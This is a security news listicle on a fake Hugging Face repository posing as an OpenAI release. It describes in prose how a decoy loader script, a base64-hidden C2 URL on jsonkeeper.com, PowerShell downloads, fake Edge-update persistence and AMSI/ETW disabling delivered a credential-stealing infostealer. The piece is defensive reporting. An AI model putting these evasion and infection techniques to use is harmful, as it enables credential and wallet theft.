10 Critical Lessons from the Hugging Face Supply Chain Attack That Mimicked OpenAI

By ⚡ min read

In a stark reminder of the growing risks in the AI supply chain, a malicious repository on Hugging Face disguised as an official OpenAI release racked up 244,000 downloads before being taken down. The incident, detailed by security firm HiddenLayer, involved a fake Open-OSS/privacy-filter repository that delivered credential-stealing malware to Windows systems. This listicle unpacks the key takeaways from the attack, offering actionable insights for enterprises and developers relying on public AI model repositories.

1. The Attack at a Glance: A Perfectly Executed Impersonation

The malicious repository Open-OSS/privacy-filter copied OpenAI's legitimate Privacy Filter release, including its model card almost verbatim. Within 18 hours, it reached the #1 trending spot on Hugging Face, buoyed by 667 likes and 244,000 downloads—numbers researchers believe were artificially inflated. The only red flag was the README, which instructed users to run start.bat on Windows or python loader.py on Linux/macOS. This single deviation from the original was enough to launch a full infostealer infection chain.

10 Critical Lessons from the Hugging Face Supply Chain Attack That Mimicked OpenAI — Source: www.infoworld.com

2. How the Malware Reached Windows Systems

The infection chain began with a loader.py script that acted as a decoy, executing legitimate-looking AI model code before unleashing malicious payloads. It disabled SSL verification, decoded a base64 URL pointing to a public JSON hosting service (jsonkeeper.com), and retrieved remote instructions. These commands were then passed to PowerShell, which downloaded a batch file from an attacker-owned domain. The batch file established persistence by creating a scheduled task masquerading as a Microsoft Edge update.

3. The Loader Script: Decoy and Deception

According to HiddenLayer, the loader.py script first ran benign decoy code to mimic a legitimate AI model loader, fooling even experienced developers. This stealthy approach allowed the malicious code to bypass initial suspicion. Only after the decoy ran did the hidden infection chain activate—a technique that exploits the trust developers place in GitHub-like repositories. The script's ability to switch between decoy and malicious execution demonstrates how sophisticated AI supply-chain attacks have become.

4. Command-and-Control via Static Hosting

The attackers used jsonkeeper.com, a free JSON hosting service, as their command-and-control (C2) channel. By encoding the C2 URL in base64 and disabling SSL verification, they made detection harder. More importantly, using a public hosting service allowed them to rotate payloads dynamically without modifying the repository itself. This technique is a growing trend in malware campaigns, as it provides attackers with a low-cost, low-risk way to update malicious instructions while evading repository scanners.

5. Persistence Through Fake Microsoft Edge Updates

Once the initial payload was downloaded, the malware established persistence by creating a scheduled task named to resemble a legitimate Microsoft Edge update process. This trick allowed the malware to survive reboots and remain active in the background. The scheduled task was designed to blend into the system, making it difficult for average users or even some security tools to spot. Persistence through system-level tasks is a common strategy for infostealers, as it ensures long-term access to sensitive data.

6. What the Infostealer Targeted

The Rust-based infostealer deployed by the campaign was highly specific in its data theft. It targeted credentials and sessions stored in Chromium- and Firefox-based browsers, Discord local storage files, cryptocurrency wallet data, and FileZilla configurations. Additionally, it harvested host system information—such as usernames, machine names, and installed software—to potentially enable further attacks. This combination of targets suggests the attackers were after both financial assets (crypto wallets) and access credentials for enterprise systems.

7. Anti-Analysis and Evasion Techniques

The malware incorporated advanced evasion techniques to avoid detection by security researchers and automated sandboxes. It attempted to disable Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), two core Windows security features. Furthermore, it checked for sandbox and virtual machine environments, halting execution if such detection occurred. This anti-analysis behavior is a hallmark of modern malware, indicating that the attackers invested significant resources in ensuring their campaign remained stealthy.

8. AI Supply Chain Risks: A Growing Concern

This incident underscores the vulnerability of public AI model registries as a software supply-chain risk. As developers clone models directly into corporate environments, they grant access to source code, cloud credentials, and internal systems. Unlike traditional software supply chains, AI model repositories often lack rigorous vetting. HiddenLayer previously found malicious code hidden inside Pickle-serialized files on Hugging Face that bypassed platform scanners. This attack reinforces the need for enterprises to treat AI model downloads with the same scrutiny as third-party software packages.

9. Hugging Face's Security Gaps and Platform Response

Despite Hugging Face's scanning efforts, the fake repository remained active long enough to accumulate massive downloads. Researchers noted that the number of downloads and likes were likely artificially inflated using bots, making the repository appear trustworthy. The platform's reliance on user reports and basic malware scanning may not be sufficient against sophisticated attacks that use decoy code and external C2 channels. Hugging Face has not publicly detailed how it removed the repository, but this incident highlights the urgent need for enhanced validation and real-time monitoring of trending repositories.

10. Broader Implications for the AI Community

HiddenLayer identified six additional malicious repositories beyond this one, suggesting a coordinated campaign targeting the AI ecosystem. The use of impersonation, artificial social proof, and Rust-based infostealers indicates that threat actors are increasingly adapting traditional malware techniques to the AI domain. As open-source AI models become integral to enterprise operations, the attack surface grows. The community must adopt stronger verification practices, such as checking repository authenticity through official channels, using containerized environments for model testing, and implementing runtime monitoring for unusual network requests.

The Hugging Face attack is a cautionary tale for every organization that incorporates public AI models into its workflow. By understanding the tactics used—from fake trending status to anti-analysis measures—security teams can better defend against these emerging threats. Always verify the source, scan for anomalies, and treat every third-party model as a potential risk until proven safe.